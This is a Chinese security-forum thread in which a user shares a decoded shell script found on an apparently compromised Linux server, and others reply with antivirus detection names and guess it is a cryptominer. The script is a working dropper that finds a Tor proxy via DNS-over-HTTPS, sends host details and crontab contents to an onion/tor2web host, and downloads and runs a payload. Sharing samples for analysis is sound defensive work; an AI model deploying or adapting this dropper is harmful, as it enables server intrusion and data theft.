收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 服务器好像被挂马了
12下一页
返回列表 发新帖
查看: 1721|回复: 17
收起左侧

[病毒样本] 服务器好像被挂马了

[复制链接]
DF快递
发表于 2021-7-1 08:39:46 | 显示全部楼层 |阅读模式
本帖最后由 DF快递 于 2021-7-1 08:42 编辑

特征:
1. 会生成一个占用大量CPU的进程
2. crontab添加一个临时任务



以下是脚本内容base64解码的内容
  1. gh6uVzRB8a0DJ3I2m68OP9Zy1ltP7ik
  2. exec &>/dev/null
  3. export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

  5. d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
  6. c=$(echo "curl -4fsSLkA- -m200")
  7. t=$(echo "sjetn54bpsfwmyxkflldgnq6kzcxd2j3bg5s4nxkzs7qoshr2jhhiyyd")

  9. sockz() {
  10. n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
  11. p=$(echo "dns-query?name=relay.tor2socks.in")
  12. s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
  13. }

  15. fexe() {
  16. for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
  17. }

  19. u() {
  20. sockz
  21. f=/int.$(uname -m)
  22. x=./$(date|md5sum|cut -f1 -d-)
  23. r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
  24. $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
  25. chmod +x $x;$x;rm -f $x
  26. }

  28. for h in tor2web.in tor2web.it
  29. do
  30. if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
  31. fexe;u $t.$h
  32. ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
  33. ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
  34. else
  35. break
  36. fi
  37. done
复制代码



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

DF快递
 楼主| 发表于 2021-7-1 08:41:13 | 显示全部楼层
本帖最后由 DF快递 于 2021-7-1 08:45 编辑

麻烦分析下是什么行为,火绒kill,ksc miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

心心相印
发表于 2021-7-1 08:44:08 | 显示全部楼层
avira miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

dreams521
发表于 2021-7-1 09:30:46 | 显示全部楼层
智量 miss
回复

举报

Shake2333
发表于 2021-7-1 10:20:58 | 显示全部楼层
fs protection 扫描miss
回复

举报

a233
发表于 2021-7-1 11:34:48 | 显示全部楼层
Avast
BV:Agent-BIV [Trj]
回复

举报

wwwab
发表于 2021-7-1 11:48:59 | 显示全部楼层
DF快递 发表于 2021-7-1 08:41
麻烦分析下是什么行为,火绒kill,ksc miss

Hello,

通过火绒的报毒分类名来看,应该是个Linux挖矿病毒
回复

举报

wwwab
发表于 2021-7-1 11:49:30 | 显示全部楼层
dreams521 发表于 2021-7-1 09:30
智量 miss

智量不处理Linux病毒
回复

举报

wwwab
发表于 2021-7-1 11:54:20 | 显示全部楼层
Hello,

已上报卡巴斯基
回复

举报

aboringman
发表于 2021-7-1 12:33:24 | 显示全部楼层
KL:Trojan.Shell.Agent.af
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-6 01:26 , Processed in 0.134607 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表